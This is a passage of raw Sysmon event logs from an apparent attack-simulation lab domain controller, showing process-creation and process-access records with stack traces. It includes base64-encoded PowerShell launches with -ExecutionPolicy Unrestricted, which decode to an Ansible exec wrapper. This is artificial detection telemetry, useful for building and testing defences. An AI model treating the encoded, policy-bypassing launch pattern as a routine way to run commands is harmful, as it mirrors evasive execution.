(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65be1e59(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bc54be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bc54be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bc534f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bb72d4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bc3807(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bc33fa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bc3123(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bc2df4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+666746d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65ba9c55(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65ba9225(wow64) 154100x80000000000000003103Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.449{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8579-5FCF-5CDD-050000000000}0x5dd5c0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8579-5FCF-9100-000000009101}4172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x80000000000000003102Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.389{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8579-5FCF-9100-000000009101}4172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003101Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.389{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8579-5FCF-9100-000000009101}4172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003100Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.342{10ACEC4A-8579-5FCF-9100-000000009101}4172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_cw3vu0ta.5r3.ps12020-12-08 13:54:01.342 10341000x80000000000000003099Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.342{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8579-5FCF-9100-000000009101}4172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003098Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8579-5FCF-8F00-000000009101}51081552C:\Windows\system32\conhost.exe{10ACEC4A-8579-5FCF-9100-000000009101}4172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003097Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003096Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003095Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003094Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003093Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003092Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003091Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003090Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003089Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003088Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8579-5FCF-9100-000000009101}4172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003087Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 